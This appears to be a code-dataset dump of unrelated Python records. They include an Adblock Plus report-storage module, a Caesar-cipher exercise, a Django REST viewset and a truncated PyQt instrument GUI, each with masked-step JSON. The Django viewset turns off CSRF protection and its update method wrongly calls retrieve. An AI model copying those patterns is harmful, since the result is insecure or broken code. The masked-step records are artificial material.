AS ctime, status, site, contact, comment, hasscreenshot, knownissues FROM #PFX#reports WHERE contact = %s ORDER BY ctime DESC LIMIT 100''', contact) rows = cursor.fetchall() cursor.close() return rows def getReport(guid): cursor = get_db().cursor() executeQuery(cursor, 'SELECT dump FROM #PFX#reports WHERE guid = %s', guid) report = cursor.fetchone() if report == None: return None reportData = marshal.loads(report[0]) return reportData def saveReport(guid, reportData, isNew=False): cursor = get_db().cursor() screenshot = reportData.get('screenshot', None) if screenshot != None: reportData['hasscreenshot'] = 2 if reportData.get('screenshotEdited', False) else 1 try: saveScreenshot(guid, screenshot) except (TypeError, UnicodeEncodeError): reportData['hasscreenshot'] = 0 del reportData['screenshot'] knownIssues = len(reportData.get('knownIssues', [])) contact = getUserId(reportData.get('email', None)) if reportData.get('email', None) else None dumpstr = marshal.dumps(reportData) if contact != None and isNew: executeQuery(cursor, 'INSERT INTO #PFX#users (id, reports) VALUES (%s, 1) ON DUPLICATE KEY UPDATE reports = reports + 1', contact) executeQuery(cursor, '''INSERT INTO #PFX#reports (guid, type, ctime, site, comment, status, contact, hasscreenshot, knownissues, dump) VALUES (%(guid)s, %(type)s, FROM_UNIXTIME(%(ctime)s), %(site)s, %(comment)s, %(status)s, %(contact)s, %(hasscreenshot)s, %(knownissues)s, _binary %(dump)s) ON DUPLICATE KEY UPDATE type = %(type)s, site = %(site)s, comment = %(comment)s, status = %(status)s, hasscreenshot = %(hasscreenshot)s, knownissues = %(knownissues)s, dump = _binary %(dump)s''', {'guid': guid, 'type': reportData.get('type', None), 'ctime': reportData['time'], 'site': reportData.get('siteName', None), 'comment': reportData.get('comment', None), 'status': reportData.get('status', None), 'contact': contact, 'hasscreenshot': reportData.get('hasscreenshot', 0), 'knownissues': knownIssues, 'dump': dumpstr}) if len(reportData['subscriptions']) > 0: for sn in reportData['subscriptions']: executeQuery(cursor, 'SELECT id FROM #PFX#subscriptions WHERE url = %s', sn['id']) id = cursor.fetchone() if id != None: def filterMatch(f): return any(u == sn['id'] for u in f.get('subscriptions', [])) hasMatches = any(filterMatch(f) for f in reportData.get('filters', [])) executeQuery(cursor, 'INSERT IGNORE INTO #PFX#sublists (report, list, hasmatches) VALUES (%s, %s, %s)', (guid, id[0], hasMatches)) get_db().commit() reportData['guid'] = guid if contact: # TODO: The mail anonymization should happen in the template, not here origEmail = reportData['email'] email = reportData['email'] email = re.sub(r' at ', r'@', email) email = re.sub(r' dot ', r'.', email) reportData['email'] = anonymizeMail(email) reportData['uid'] = contact file = os.path.join(get_config().get('reports', 'dataPath'), guid[0], guid[1], guid[2], guid[3], guid + '.html') dir = os.path.dirname(file) if not os.path.exists(dir): os.makedirs(dir) template = get_template(get_config().get('reports', 'webTemplate')) template.stream(reportData).dump(file, encoding='utf-8') if contact: reportData['email'] = origEmail def removeReport(guid): cursor = get_db().cursor() executeQuery(cursor, 'DELETE FROM #PFX#reports WHERE guid = %s', guid) get_db().commit() file = os.path.join(get_config().get('reports', 'dataPath'), guid[0], guid[1], guid[2], guid[3], guid + '.html') if os.path.isfile(file): os.remove(file) file = os.path.join(get_config().get('reports', 'dataPath'), guid[0], guid[1], guid[2], guid[3], guid + '.png') if os.path.isfile(file): os.remove(file) def getUser(contact): cursor = get_db().cursor(MySQLdb.cursors.DictCursor) executeQuery(cursor, 'SELECT reports, positive, negative FROM #PFX#users WHERE id = %s', contact) user = cursor.fetchone() return user @cached(3600) def getUserUsefulnessScore(contact): if contact == None: return 0 cursor = get_db().cursor() # source from http://www.evanmiller.org/how-not-to-sort-by-average-rating.html executeQuery(cursor, '''SELECT ((positive + 1.9208) / (positive + negative) - 1.96 * SQRT((positive * negative) / (positive + negative) + 0.9604) / (positive + negative)) / (1 + 3.8416 / (positive + negative)) AS score FROM #PFX#users WHERE id = %s''', contact) score = cursor.fetchone() if score == None: return 0 if score[0] == None: # no score yet return 0.3 else: return 4 * score[0] def updateUserUsefulness(contact, newusefulness, oldusefulness): new = int(newusefulness) old = int(oldusefulness) if new == old: return positive = 0 negative = 0 if old > 0: positive -= 1 elif old < 0: negative -= 1 if new > 0: positive += 1 elif new < 0: negative += 1 cursor = get_db().cursor() executeQuery(cursor, 'UPDATE #PFX#users SET negative = negative + %s, positive = positive + %s WHERE id = %s', (negative, positive, contact)) get_db().commit() def saveScreenshot(guid, screenshot): prefix = 'data:image/png;base64,' if not screenshot.startswith(prefix): raise TypeError('Screenshot is not a PNG image') data = base64.b64decode(screenshot[len(prefix):]) file = os.path.join(get_config().get('reports', 'dataPath'), guid[0], guid[1], guid[2], guid[3], guid + '.png') dir = os.path.dirname(file) if not os.path.exists(dir): os.makedirs(dir) f = open(file, 'wb') f.write(data) f.close() if get_config().has_option('reports', 'pngOptimizerPath'): cmd = get_config().get('reports', 'pngOptimizerPath').split() cmd.append(file) subprocess.call(cmd) def mailDigest(templateData): sendMail(get_config().get('reports', 'mailDigestTemplate'), templateData) def sendUpdateNotification(templateData): sendMail(get_config().get('reports', 'notificationTemplate'), templateData) def calculateReportSecret(guid): return hmac.new(get_config().get('reports', 'secret'), guid).hexdigest() def calculateReportSecret_compat(guid): hash = hashlib.md5() hash.update(get_config().get('reports', 'secret')) hash.update(guid) return hash.hexdigest() def getUserId(email): return hmac.new(get_config().get('reports', 'secret'), email.encode('utf-8')).hexdigest() def getDigestId(email): hash = hashlib.md5() hash.update(email.encode('utf-8')) return hash.hexdigest() def getDigestPath(dir, email): return os.path.join(dir, getDigestId(email) + '.html') def getDigestSecret(id, (year, week, weekday)): mac = hmac.new(get_config().get('reports', 'secret'), id) mac.update(str(year)) mac.update(str(week)) return mac.hexdigest() def getDigestSecret_compat(id, (year, week, weekday)): hash = hashlib.md5() hash.update(get_config().get('reports', 'secret')) hash.update(id) hash.update(str(year)) hash.update(str(week)) return hash.hexdigest() @cached(600) def get_db(): database = get_config().get('reports', 'database') dbuser = get_config().get('reports', 'dbuser') dbpasswd = get_config().get('reports', 'dbpassword') if os.name == 'nt': return MySQLdb.connect(user=dbuser, passwd=dbpasswd, db=database, use_unicode=True, charset='utf8', named_pipe=True) else: return MySQLdb.connect(user=dbuser, passwd=dbpasswd, db=database, use_unicode=True, charset='utf8') def executeQuery(cursor, query, args=None): tablePrefix = get_config().get('reports', 'dbprefix') query = re.sub(r'#PFX#', tablePrefix, query) cursor.execute(query, args)
normal
{ "blob_id": "bfc6f6acef26e3dc4f6bf2b76363daec68c53cd1", "index": 5709, "step-1": "# This file is part of the Adblock Plus web scripts,\n# Copyright (C) 2006-present eyeo GmbH\n#\n# Adblock Plus is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 3 as\n# published by the Free Software Foundation.\n#\n# Adblock Plus is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Adblock Plus. If not, see <http://www.gnu.org/licenses/>.\n\nimport hashlib\nimport hmac\nimport base64\nimport MySQLdb\nimport os\nimport re\nimport marshal\nimport subprocess\nfrom sitescripts.utils import get_config, cached, get_template, anonymizeMail, sendMail\n\n\ndef getReportSubscriptions(guid):\n cursor = get_db().cursor(MySQLdb.cursors.DictCursor)\n executeQuery(cursor,\n '''SELECT url, hasmatches FROM #PFX#sublists INNER JOIN\n #PFX#subscriptions ON (#PFX#sublists.list = #PFX#subscriptions.id)\n WHERE report = %s''',\n guid)\n rows = cursor.fetchall()\n cursor.close()\n return rows\n\n\ndef getReports(startTime):\n count = 10000\n offset = 0\n while True:\n cursor = get_db().cursor(MySQLdb.cursors.DictCursor)\n executeQuery(cursor,\n '''SELECT guid, type, UNIX_TIMESTAMP(ctime) AS ctime, status, site, contact,\n comment, hasscreenshot, knownissues\n FROM #PFX#reports WHERE ctime >= FROM_UNIXTIME(%s) LIMIT %s OFFSET %s''',\n (startTime, count, offset))\n rows = cursor.fetchall()\n cursor.close()\n if len(rows) == 0:\n break\n for row in rows:\n yield row\n offset += len(rows)\n\n\ndef getReportsForUser(contact):\n cursor = get_db().cursor(MySQLdb.cursors.DictCursor)\n executeQuery(cursor,\n '''SELECT guid, type, UNIX_TIMESTAMP(ctime) AS ctime, status, site, contact,\n comment, hasscreenshot, knownissues\n FROM #PFX#reports WHERE contact = %s ORDER BY ctime DESC LIMIT 100''',\n contact)\n rows = cursor.fetchall()\n cursor.close()\n return rows\n\n\ndef getReport(guid):\n cursor = get_db().cursor()\n executeQuery(cursor, 'SELECT dump FROM #PFX#reports WHERE guid = %s', guid)\n report = cursor.fetchone()\n if report == None:\n return None\n\n reportData = marshal.loads(report[0])\n return reportData\n\n\ndef saveReport(guid, reportData, isNew=False):\n cursor = get_db().cursor()\n screenshot = reportData.get('screenshot', None)\n if screenshot != None:\n reportData['hasscreenshot'] = 2 if reportData.get('screenshotEdited', False) else 1\n try:\n saveScreenshot(guid, screenshot)\n except (TypeError, UnicodeEncodeError):\n reportData['hasscreenshot'] = 0\n del reportData['screenshot']\n knownIssues = len(reportData.get('knownIssues', []))\n contact = getUserId(reportData.get('email', None)) if reportData.get('email', None) else None\n dumpstr = marshal.dumps(reportData)\n\n if contact != None and isNew:\n executeQuery(cursor, 'INSERT INTO #PFX#users (id, reports) VALUES (%s, 1) ON DUPLICATE KEY UPDATE reports = reports + 1', contact)\n executeQuery(cursor,\n '''INSERT INTO #PFX#reports (guid, type, ctime, site, comment, status, contact, hasscreenshot, knownissues, dump)\n VALUES (%(guid)s, %(type)s, FROM_UNIXTIME(%(ctime)s), %(site)s, %(comment)s, %(status)s, %(contact)s,\n %(hasscreenshot)s, %(knownissues)s, _binary %(dump)s) ON DUPLICATE KEY\n UPDATE type = %(type)s, site = %(site)s, comment = %(comment)s, status = %(status)s,\n hasscreenshot = %(hasscreenshot)s, knownissues = %(knownissues)s, dump = _binary %(dump)s''',\n {'guid': guid, 'type': reportData.get('type', None), 'ctime': reportData['time'], 'site': reportData.get('siteName', None),\n 'comment': reportData.get('comment', None), 'status': reportData.get('status', None), 'contact': contact,\n 'hasscreenshot': reportData.get('hasscreenshot', 0), 'knownissues': knownIssues, 'dump': dumpstr})\n if len(reportData['subscriptions']) > 0:\n for sn in reportData['subscriptions']:\n executeQuery(cursor, 'SELECT id FROM #PFX#subscriptions WHERE url = %s', sn['id'])\n id = cursor.fetchone()\n if id != None:\n def filterMatch(f):\n return any(u == sn['id'] for u in f.get('subscriptions', []))\n hasMatches = any(filterMatch(f) for f in reportData.get('filters', []))\n executeQuery(cursor, 'INSERT IGNORE INTO #PFX#sublists (report, list, hasmatches) VALUES (%s, %s, %s)', (guid, id[0], hasMatches))\n\n get_db().commit()\n\n reportData['guid'] = guid\n if contact:\n # TODO: The mail anonymization should happen in the template, not here\n origEmail = reportData['email']\n email = reportData['email']\n email = re.sub(r' at ', r'@', email)\n email = re.sub(r' dot ', r'.', email)\n reportData['email'] = anonymizeMail(email)\n reportData['uid'] = contact\n\n file = os.path.join(get_config().get('reports', 'dataPath'), guid[0], guid[1], guid[2], guid[3], guid + '.html')\n dir = os.path.dirname(file)\n if not os.path.exists(dir):\n os.makedirs(dir)\n template = get_template(get_config().get('reports', 'webTemplate'))\n template.stream(reportData).dump(file, encoding='utf-8')\n\n if contact:\n reportData['email'] = origEmail\n\n\ndef removeReport(guid):\n cursor = get_db().cursor()\n executeQuery(cursor, 'DELETE FROM #PFX#reports WHERE guid = %s', guid)\n get_db().commit()\n file = os.path.join(get_config().get('reports', 'dataPath'), guid[0], guid[1], guid[2], guid[3], guid + '.html')\n if os.path.isfile(file):\n os.remove(file)\n file = os.path.join(get_config().get('reports', 'dataPath'), guid[0], guid[1], guid[2], guid[3], guid + '.png')\n if os.path.isfile(file):\n os.remove(file)\n\n\ndef getUser(contact):\n cursor = get_db().cursor(MySQLdb.cursors.DictCursor)\n executeQuery(cursor, 'SELECT reports, positive, negative FROM #PFX#users WHERE id = %s', contact)\n user = cursor.fetchone()\n return user\n\n\n@cached(3600)\ndef getUserUsefulnessScore(contact):\n if contact == None:\n return 0\n\n cursor = get_db().cursor()\n # source from http://www.evanmiller.org/how-not-to-sort-by-average-rating.html\n executeQuery(cursor,\n '''SELECT ((positive + 1.9208) / (positive + negative)\n - 1.96 * SQRT((positive * negative) / (positive + negative) + 0.9604) / (positive + negative))\n / (1 + 3.8416 / (positive + negative)) AS score FROM #PFX#users WHERE id = %s''',\n contact)\n score = cursor.fetchone()\n if score == None:\n return 0\n\n if score[0] == None: # no score yet\n return 0.3\n else:\n return 4 * score[0]\n\n\ndef updateUserUsefulness(contact, newusefulness, oldusefulness):\n new = int(newusefulness)\n old = int(oldusefulness)\n if new == old:\n return\n positive = 0\n negative = 0\n if old > 0:\n positive -= 1\n elif old < 0:\n negative -= 1\n if new > 0:\n positive += 1\n elif new < 0:\n negative += 1\n cursor = get_db().cursor()\n executeQuery(cursor, 'UPDATE #PFX#users SET negative = negative + %s, positive = positive + %s WHERE id = %s', (negative, positive, contact))\n get_db().commit()\n\n\ndef saveScreenshot(guid, screenshot):\n prefix = 'data:image/png;base64,'\n if not screenshot.startswith(prefix):\n raise TypeError('Screenshot is not a PNG image')\n data = base64.b64decode(screenshot[len(prefix):])\n file = os.path.join(get_config().get('reports', 'dataPath'), guid[0], guid[1], guid[2], guid[3], guid + '.png')\n dir = os.path.dirname(file)\n if not os.path.exists(dir):\n os.makedirs(dir)\n f = open(file, 'wb')\n f.write(data)\n f.close()\n if get_config().has_option('reports', 'pngOptimizerPath'):\n cmd = get_config().get('reports', 'pngOptimizerPath').split()\n cmd.append(file)\n subprocess.call(cmd)\n\n\ndef mailDigest(templateData):\n sendMail(get_config().get('reports', 'mailDigestTemplate'), templateData)\n\n\ndef sendUpdateNotification(templateData):\n sendMail(get_config().get('reports', 'notificationTemplate'), templateData)\n\n\ndef calculateReportSecret(guid):\n return hmac.new(get_config().get('reports', 'secret'), guid).hexdigest()\n\n\ndef calculateReportSecret_compat(guid):\n hash = hashlib.md5()\n hash.update(get_config().get('reports', 'secret'))\n hash.update(guid)\n return hash.hexdigest()\n\n\ndef getUserId(email):\n return hmac.new(get_config().get('reports', 'secret'), email.encode('utf-8')).hexdigest()\n\n\ndef getDigestId(email):\n hash = hashlib.md5()\n hash.update(email.encode('utf-8'))\n return hash.hexdigest()\n\n\ndef getDigestPath(dir, email):\n return os.path.join(dir, getDigestId(email) + '.html')\n\n\ndef getDigestSecret(id, (year, week, weekday)):\n mac = hmac.new(get_config().get('reports', 'secret'), id)\n mac.update(str(year))\n mac.update(str(week))\n return mac.hexdigest()\n\n\ndef getDigestSecret_compat(id, (year, week, weekday)):\n hash = hashlib.md5()\n hash.update(get_config().get('reports', 'secret'))\n hash.update(id)\n hash.update(str(year))\n hash.update(str(week))\n return hash.hexdigest()\n\n\n@cached(600)\ndef get_db():\n database = get_config().get('reports', 'database')\n dbuser = get_config().get('reports', 'dbuser')\n dbpasswd = get_config().get('reports', 'dbpassword')\n if os.name == 'nt':\n return MySQLdb.connect(user=dbuser, passwd=dbpasswd, db=database, use_unicode=True, charset='utf8', named_pipe=True)\n else:\n return MySQLdb.connect(user=dbuser, passwd=dbpasswd, db=database, use_unicode=True, charset='utf8')\n\n\ndef executeQuery(cursor, query, args=None):\n tablePrefix = get_config().get('reports', 'dbprefix')\n query = re.sub(r'#PFX#', tablePrefix, query)\n cursor.execute(query, args)\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
#https://www.hackerrank.com/challenges/caesar-cipher-1/problem n=int(input()) stringy=input() k=int(input()) s="" for i in stringy: if ord(i)>=65 and ord(i)<=90: temp=(ord(i)+k-65)%26 s+=chr(temp+65) elif ord(i)>=97 and ord(i)<=122: temp=(ord(i)+k-97)%26 s+=chr(temp+97) else: s+=i print(s)
normal
{ "blob_id": "acf787885834961a71fb2655b9d8a1eb026942c7", "index": 4089, "step-1": "<mask token>\n", "step-2": "<mask token>\nfor i in stringy:\n if ord(i) >= 65 and ord(i) <= 90:\n temp = (ord(i) + k - 65) % 26\n s += chr(temp + 65)\n elif ord(i) >= 97 and ord(i) <= 122:\n temp = (ord(i) + k - 97) % 26\n s += chr(temp + 97)\n else:\n s += i\nprint(s)\n", "step-3": "n = int(input())\nstringy = input()\nk = int(input())\ns = ''\nfor i in stringy:\n if ord(i) >= 65 and ord(i) <= 90:\n temp = (ord(i) + k - 65) % 26\n s += chr(temp + 65)\n elif ord(i) >= 97 and ord(i) <= 122:\n temp = (ord(i) + k - 97) % 26\n s += chr(temp + 97)\n else:\n s += i\nprint(s)\n", "step-4": "#https://www.hackerrank.com/challenges/caesar-cipher-1/problem\n\nn=int(input())\nstringy=input()\nk=int(input())\ns=\"\"\nfor i in stringy:\n if ord(i)>=65 and ord(i)<=90:\n temp=(ord(i)+k-65)%26\n s+=chr(temp+65)\n elif ord(i)>=97 and ord(i)<=122:\n temp=(ord(i)+k-97)%26\n s+=chr(temp+97)\n else:\n s+=i\nprint(s)\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
from django.shortcuts import render from rest_framework import generics from rest_framework import mixins from django.contrib.auth.models import User from rest_framework import permissions from rest_framework.decorators import api_view from rest_framework.response import Response from rest_framework.request import Request from rest_framework.reverse import reverse from rest_framework import renderers from rest_framework import viewsets # Create your views here. from rest_framework.decorators import action from community.csrfsession import CsrfExemptSessionAuthentication from .serializers import InstitutionSerializer, UserSerializer from .models import Institution from rest_framework.exceptions import PermissionDenied from community.permissions import isInstitutionAdmin, getUserInstitution, belongsToInstitution, canUpdateProfile from community.filters import applyUserFilters, applyInstitutionFilters from community.mappings import generateKeys from django.db.models import Q class InstitutionViewSet(viewsets.ModelViewSet): """ This viewset automatically provides `list`, `create`, `retrieve`, `update` and `destroy` actions. Additionally we also provide an extra `highlight` action. """ queryset = Institution.objects.all() serializer_class = InstitutionSerializer permission_classes = (permissions.IsAuthenticatedOrReadOnly, ) authentication_classes = (CsrfExemptSessionAuthentication, ) def list(self, request, *args, **kwargs): if request.user.is_superuser: self.queryset = applyInstitutionFilters(request, Institution, *args, **kwargs) response = super(InstitutionViewSet, self).list(request, *args, **kwargs) response = generateKeys(response, self.serializer_class) return response def retrieve(self, request, *args, **kwargs): if not belongsToInstitution(request, self.get_object()): raise PermissionDenied(detail='User does not belong to the institution', code=None) return super(InstitutionViewSet, self).retrieve(request, *args, **kwargs) def update(self, request, *args, **kwargs): if not isInstitutionAdmin(request, self.get_object()): raise PermissionDenied(detail='User is not an admin_user', code=None) return super(InstitutionViewSet, self).retrieve(request, *args, **kwargs) def get_permissions(self): """ Instantiates and returns the list of permissions that this view requires. """ from rest_framework.permissions import IsAuthenticated, IsAdminUser if self.action =='retrieve' or self.action == 'update': permission_classes = [IsAuthenticated] else: permission_classes = [IsAdminUser] return [permission() for permission in permission_classes] class UserViewSet(viewsets.ReadOnlyModelViewSet): """ This viewset automatically provides `list` and `detail` actions. """ queryset = User.objects.all() serializer_class = UserSerializer @api_view(['GET']) def api_root(request, format=None): authentication_classes = [] return Response({ 'users': reverse('user-list', request=request, format=format), 'institutions': reverse('institution-list', request=request, format=format) })
normal
{ "blob_id": "4c43c181dbba1680e036750a2a2ea1185bbe91da", "index": 3218, "step-1": "<mask token>\n\n\nclass InstitutionViewSet(viewsets.ModelViewSet):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def get_permissions(self):\n \"\"\"\n Instantiates and returns the list of permissions that this view requires.\n \"\"\"\n from rest_framework.permissions import IsAuthenticated, IsAdminUser\n if self.action == 'retrieve' or self.action == 'update':\n permission_classes = [IsAuthenticated]\n else:\n permission_classes = [IsAdminUser]\n return [permission() for permission in permission_classes]\n\n\nclass UserViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n This viewset automatically provides `list` and `detail` actions.\n \"\"\"\n queryset = User.objects.all()\n serializer_class = UserSerializer\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass InstitutionViewSet(viewsets.ModelViewSet):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def list(self, request, *args, **kwargs):\n if request.user.is_superuser:\n self.queryset = applyInstitutionFilters(request, Institution, *\n args, **kwargs)\n response = super(InstitutionViewSet, self).list(request, *args, **\n kwargs)\n response = generateKeys(response, self.serializer_class)\n return response\n\n def retrieve(self, request, *args, **kwargs):\n if not belongsToInstitution(request, self.get_object()):\n raise PermissionDenied(detail=\n 'User does not belong to the institution', code=None)\n return super(InstitutionViewSet, self).retrieve(request, *args, **\n kwargs)\n\n def update(self, request, *args, **kwargs):\n if not isInstitutionAdmin(request, self.get_object()):\n raise PermissionDenied(detail='User is not an admin_user', code\n =None)\n return super(InstitutionViewSet, self).retrieve(request, *args, **\n kwargs)\n\n def get_permissions(self):\n \"\"\"\n Instantiates and returns the list of permissions that this view requires.\n \"\"\"\n from rest_framework.permissions import IsAuthenticated, IsAdminUser\n if self.action == 'retrieve' or self.action == 'update':\n permission_classes = [IsAuthenticated]\n else:\n permission_classes = [IsAdminUser]\n return [permission() for permission in permission_classes]\n\n\nclass UserViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n This viewset automatically provides `list` and `detail` actions.\n \"\"\"\n queryset = User.objects.all()\n serializer_class = UserSerializer\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\nclass InstitutionViewSet(viewsets.ModelViewSet):\n \"\"\"\n This viewset automatically provides `list`, `create`, `retrieve`,\n `update` and `destroy` actions.\n\n Additionally we also provide an extra `highlight` action.\n \"\"\"\n queryset = Institution.objects.all()\n serializer_class = InstitutionSerializer\n permission_classes = permissions.IsAuthenticatedOrReadOnly,\n authentication_classes = CsrfExemptSessionAuthentication,\n\n def list(self, request, *args, **kwargs):\n if request.user.is_superuser:\n self.queryset = applyInstitutionFilters(request, Institution, *\n args, **kwargs)\n response = super(InstitutionViewSet, self).list(request, *args, **\n kwargs)\n response = generateKeys(response, self.serializer_class)\n return response\n\n def retrieve(self, request, *args, **kwargs):\n if not belongsToInstitution(request, self.get_object()):\n raise PermissionDenied(detail=\n 'User does not belong to the institution', code=None)\n return super(InstitutionViewSet, self).retrieve(request, *args, **\n kwargs)\n\n def update(self, request, *args, **kwargs):\n if not isInstitutionAdmin(request, self.get_object()):\n raise PermissionDenied(detail='User is not an admin_user', code\n =None)\n return super(InstitutionViewSet, self).retrieve(request, *args, **\n kwargs)\n\n def get_permissions(self):\n \"\"\"\n Instantiates and returns the list of permissions that this view requires.\n \"\"\"\n from rest_framework.permissions import IsAuthenticated, IsAdminUser\n if self.action == 'retrieve' or self.action == 'update':\n permission_classes = [IsAuthenticated]\n else:\n permission_classes = [IsAdminUser]\n return [permission() for permission in permission_classes]\n\n\nclass UserViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n This viewset automatically provides `list` and `detail` actions.\n \"\"\"\n queryset = User.objects.all()\n serializer_class = UserSerializer\n\n\n<mask token>\n", "step-4": "<mask token>\n\n\nclass InstitutionViewSet(viewsets.ModelViewSet):\n \"\"\"\n This viewset automatically provides `list`, `create`, `retrieve`,\n `update` and `destroy` actions.\n\n Additionally we also provide an extra `highlight` action.\n \"\"\"\n queryset = Institution.objects.all()\n serializer_class = InstitutionSerializer\n permission_classes = permissions.IsAuthenticatedOrReadOnly,\n authentication_classes = CsrfExemptSessionAuthentication,\n\n def list(self, request, *args, **kwargs):\n if request.user.is_superuser:\n self.queryset = applyInstitutionFilters(request, Institution, *\n args, **kwargs)\n response = super(InstitutionViewSet, self).list(request, *args, **\n kwargs)\n response = generateKeys(response, self.serializer_class)\n return response\n\n def retrieve(self, request, *args, **kwargs):\n if not belongsToInstitution(request, self.get_object()):\n raise PermissionDenied(detail=\n 'User does not belong to the institution', code=None)\n return super(InstitutionViewSet, self).retrieve(request, *args, **\n kwargs)\n\n def update(self, request, *args, **kwargs):\n if not isInstitutionAdmin(request, self.get_object()):\n raise PermissionDenied(detail='User is not an admin_user', code\n =None)\n return super(InstitutionViewSet, self).retrieve(request, *args, **\n kwargs)\n\n def get_permissions(self):\n \"\"\"\n Instantiates and returns the list of permissions that this view requires.\n \"\"\"\n from rest_framework.permissions import IsAuthenticated, IsAdminUser\n if self.action == 'retrieve' or self.action == 'update':\n permission_classes = [IsAuthenticated]\n else:\n permission_classes = [IsAdminUser]\n return [permission() for permission in permission_classes]\n\n\nclass UserViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n This viewset automatically provides `list` and `detail` actions.\n \"\"\"\n queryset = User.objects.all()\n serializer_class = UserSerializer\n\n\n@api_view(['GET'])\ndef api_root(request, format=None):\n authentication_classes = []\n return Response({'users': reverse('user-list', request=request, format=\n format), 'institutions': reverse('institution-list', request=\n request, format=format)})\n", "step-5": "from django.shortcuts import render\nfrom rest_framework import generics\nfrom rest_framework import mixins\nfrom django.contrib.auth.models import User\nfrom rest_framework import permissions\n\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom rest_framework.request import Request\nfrom rest_framework.reverse import reverse\nfrom rest_framework import renderers\nfrom rest_framework import viewsets\n# Create your views here.\n\nfrom rest_framework.decorators import action\nfrom community.csrfsession import CsrfExemptSessionAuthentication\nfrom .serializers import InstitutionSerializer, UserSerializer\nfrom .models import Institution\nfrom rest_framework.exceptions import PermissionDenied\nfrom community.permissions import isInstitutionAdmin, getUserInstitution, belongsToInstitution, canUpdateProfile\nfrom community.filters import applyUserFilters, applyInstitutionFilters\nfrom community.mappings import generateKeys\nfrom django.db.models import Q\n\nclass InstitutionViewSet(viewsets.ModelViewSet):\n \"\"\"\n This viewset automatically provides `list`, `create`, `retrieve`,\n `update` and `destroy` actions.\n\n Additionally we also provide an extra `highlight` action.\n \"\"\"\n queryset = Institution.objects.all()\n serializer_class = InstitutionSerializer\n permission_classes = (permissions.IsAuthenticatedOrReadOnly, )\n authentication_classes = (CsrfExemptSessionAuthentication, )\n\n def list(self, request, *args, **kwargs):\n if request.user.is_superuser:\n self.queryset = applyInstitutionFilters(request, Institution, *args, **kwargs)\n response = super(InstitutionViewSet, self).list(request, *args, **kwargs)\n response = generateKeys(response, self.serializer_class)\n return response\n\n def retrieve(self, request, *args, **kwargs):\n if not belongsToInstitution(request, self.get_object()):\n raise PermissionDenied(detail='User does not belong to the institution', code=None)\n return super(InstitutionViewSet, self).retrieve(request, *args, **kwargs)\n\n def update(self, request, *args, **kwargs):\n if not isInstitutionAdmin(request, self.get_object()):\n raise PermissionDenied(detail='User is not an admin_user', code=None)\n return super(InstitutionViewSet, self).retrieve(request, *args, **kwargs)\n\n\n def get_permissions(self):\n \"\"\"\n Instantiates and returns the list of permissions that this view requires.\n \"\"\"\n from rest_framework.permissions import IsAuthenticated, IsAdminUser\n if self.action =='retrieve' or self.action == 'update':\n permission_classes = [IsAuthenticated]\n else:\n permission_classes = [IsAdminUser]\n return [permission() for permission in permission_classes]\n\nclass UserViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n This viewset automatically provides `list` and `detail` actions.\n \"\"\"\n queryset = User.objects.all()\n serializer_class = UserSerializer\n\n@api_view(['GET'])\ndef api_root(request, format=None):\n authentication_classes = []\n return Response({\n 'users': reverse('user-list', request=request, format=format),\n 'institutions': reverse('institution-list', request=request, format=format)\n })", "step-ids": [ 5, 8, 10, 11, 13 ] }
[ 5, 8, 10, 11, 13 ]
# -*- coding: utf-8 -*- """ Created on 11/03/2020 @author: [email protected] """ import sys from PyQt5.QtWidgets import (QApplication, QWidget, QLabel, QRadioButton, QVBoxLayout, QCheckBox, QProgressBar, QGroupBox, QComboBox, QLineEdit, QPushButton, QMessageBox, QInputDialog, QDialog, QDialogButtonBox, QSlider, QGridLayout, QHBoxLayout) from PyQt5.QtGui import QIcon, QPainter, QPen, QFont, QPixmap from PyQt5.QtCore import Qt from PyQt5.QtCore import QCoreApplication, QObject, QRunnable, QThread, QThreadPool, pyqtSignal, pyqtSlot #append the relative location you want to import from sys.path.append("../Instrument_Libraries") from instrumentConfig import Instrument #For some reason the following code needs to be here for the Steam icon to show on the taskbar. #Google code, don't know why. import ctypes myappid = u'mycompany.myproduct.subproduct.version' # arbitrary string ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid) class MainWindow(QWidget): instrumentName = "Unitialized Instrument" instrumentList = [] #Instrument Types is a dictionary instrumentTypes = {} instrumentKey = "Uninitialized Key" def __init__(self): super(MainWindow, self).__init__() self.configInstrument = Instrument() self.instrumentList = self.configInstrument.listInstruments() self.instrumentTypes = self.configInstrument.listInstrumentTypes() self.initUI() def initUI(self): self.setGeometry(300, 300, 500, 600) self.setWindowTitle('Tektronix Channel Label Widget') self.setWindowIcon(QIcon('Steam_icon_logo.gif')) instrumentGroupBox = QGroupBox() instrumentGrid = QGridLayout() self.scopeComboBox = QComboBox() for index in range (0, len(self.instrumentList)): self.scopeComboBox.addItem(self.instrumentList[index].rstrip()) instrumentGrid.addWidget(self.scopeComboBox, 0, 0) self.initScopeButton = QPushButton('Initialize Scope', self) self.initScopeButton.clicked[bool].connect(self.initScope) instrumentGrid.addWidget(self.initScopeButton, 1, 0) scopeLabel = QLabel(self) scopeLabel.setText("Scope Type") instrumentGrid.addWidget(scopeLabel, 2, 0) self.scopeIDN = QLabel(self) self.scopeIDN.setText(self.instrumentName) instrumentGrid.addWidget(self.scopeIDN, 3, 0) instrumentGroupBox.setLayout(instrumentGrid) instrumentGroupBox.setLayout(instrumentGrid) startButtonGroupBox = QGroupBox() startButtonLayout = QHBoxLayout() self.startStopButton = QPushButton('Test Scope Connection', self) self.startStopButton.clicked[bool].connect(self.startStopTest) 